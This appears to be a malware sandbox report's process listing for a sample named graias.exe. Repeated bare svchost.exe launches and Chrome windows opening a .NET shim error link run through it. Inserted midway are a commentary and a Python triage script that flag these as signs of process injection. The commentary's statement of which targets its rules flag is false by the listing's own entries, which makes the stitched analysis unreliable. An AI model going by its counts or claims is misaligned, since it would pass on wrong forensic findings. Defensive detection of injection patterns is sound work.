                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                            Start time:12:41:56
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Imagebase: 0x610000
File size: 985'600 bytes
MD5 hash: 4A9440BAA61BE8363A372B0BBC5933AD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 13
Start time: 12:41:56
Start date: 04/01/2025
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: svchost.exe
Imagebase: 0x60000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 12:41:56
Start date: 04/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276
Imagebase: 0xa50000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 12:41:56
Start date: 04/01/2025
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 16
Start time: 12:42:00
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 17
Start time: 12:42:01
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2300,i,10737837625504977776,1997224637472770813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 18
Start time: 12:42:04
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 12:42:04
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,4138460331120134385,5683384739135737573,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 12:42:04
Start date: 04/01/2025
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: svchost.exe
Imagebase: 0x60000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 12:42:13
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 12:42:13
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1976,i,2517950207159565068,10782540892853908230,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 12:42:13
Start date: 04/01/2025
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: svchost.exe
Imagebase: 0x60000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 12:42:16
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:12:42:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1980,i,683593662308323729,9862283109921041436,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:12:42:17
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x7ff70f330000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:12:42:21
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:12:42:21
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=828 --field-trial-handle=1136,i,5921432477754910368,13753575883471156045,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,17133631053466548675,5917926669792758127,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:12:42:26
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:12:42:30
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                            Start time:12:42:31
                                                                                                                                                                                            Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1908,i,16046133886444858587,11187754230774806872,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:12:42:33
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:12:42:34
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,5631293592904426678,1728656617054090218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:12:42:34
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:12:42:37
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:12:42:37
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1152,i,8013400789958701554,8044825980928044458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:12:42:41
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:12:42:41
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:12:42:42
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:12:42:46
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:12:42:46
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1972,i,9724548607629697657,13638253049410839489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
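Two things in the process records above are worth turning into a rule rather than reading by eye. First, the svchost.exe instances (Target IDs 39 and 44) run from SysWOW64 with the bare command line "svchost.exe": services.exe always starts a service host with "-k <group>", so a bare svchost.exe is one spawned by something else, which fits the report's "Injects a PE file into a foreign processes" and "Maps a DLL or memory area into another process" signatures. Second, every Chrome launch with "--single-argument http://go.microsoft.com/fwlink/?...o1=SHIM_NOVERSION_FOUND...processName=svchost.exe" is the .NET Framework shim (mscoree) reporting that a managed image asked for a CLR version that is not installed; svchost.exe is a native binary, so its name reaching the shim means managed code was executing inside a process called svchost.exe. The Python below is an added example, not Joe Sandbox code, that parses records in this report's "Key:value" layout and flags both patterns. The input is constructed: targets 37 and 39 are copied from the entries above (only the fields the rules need), and target 900 is a made-up, correctly launched service host used as a negative control; the rule names and finding fields are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: targets 37 and 39 are taken from the report's process
# listing; target 900 is invented as a benign control (real svchost invocations
# carry "-k <group>" from services.exe).
SAMPLE_RECORDS = """\
Target ID:37
Start time:12:42:33
Path:C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000

Target ID:39
Start time:12:42:34
Path:C:\\Windows\\SysWOW64\\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000

Target ID:900
Start time:12:00:00
Path:C:\\Windows\\System32\\svchost.exe
Wow64 process (32bit):false
Commandline:C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s Schedule
Imagebase:0x7ff6a0000000
"""

SERVICE_GROUP = re.compile(r"(?:^|\s)-k\s+\S")
FWLINK = re.compile(r"https?://go\.microsoft\.com/fwlink/\?\S+", re.I)


def parse_records(text):
    """Split blank-line separated 'Key:value' blocks into one dict per process."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # first colon only: values hold 'C:\'
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_svchost(rec):
    """Flag svchost.exe started without the '-k <group>' that services.exe passes."""
    if image_name(rec.get("Path", "")) != "svchost.exe":
        return None
    cmd = rec.get("Commandline", "")
    if SERVICE_GROUP.search(cmd):
        return None
    return {
        "rule": "svchost_no_service_group",
        "target": rec.get("Target ID"),
        "process": image_name(rec.get("Path", "")),
        "detail": f"{rec.get('Path')} started as {cmd!r}, "
                  f"wow64={rec.get('Wow64 process (32bit)')}, "
                  f"imagebase={rec.get('Imagebase')}",
    }


def check_dotnet_shim(rec):
    """Flag the .NET shim's SHIM_NOVERSION_FOUND link; processName is the image
    that tried to load the CLR, which for a native binary means injected managed code."""
    m = FWLINK.search(rec.get("Commandline", ""))
    if not m:
        return None
    q = parse_qs(urlsplit(m.group(0)).query)
    if q.get("o1", [""])[0] != "SHIM_NOVERSION_FOUND":
        return None
    proc = q.get("processName", [""])[0]
    return {
        "rule": "dotnet_shim_error",
        "target": rec.get("Target ID"),
        "process": proc.lower(),
        "detail": f"{proc} requested CLR {q.get('version', ['?'])[0]} "
                  f"via shim {q.get('shimver', ['?'])[0]}",
    }


def triage(records):
    """Run every rule over every record; return the list of findings."""
    findings = []
    for rec in records:
        for check in (check_svchost, check_dotnet_shim):
            hit = check(rec)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE_RECORDS)):
        print(f"[{f['rule']}] target {f['target']}: {f['detail']}")
```

Both rules are cheap to run over a whole process tree, and they corroborate each other here: the shim link names svchost.exe, and the only svchost.exe instances in the tree are the ones with no service group. Pasting the full listing above into SAMPLE_RECORDS flags 39 and 44 under the first rule and 37, 40, 42, 45 and 47 under the second.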

Target ID:47
Start time:12:42:49
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                            Start time:12:42:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                            Start time:12:42:50
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1964,i,11798321828357005052,16972695017880113129,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                            Start time:12:42:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                            Start time:12:42:54
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
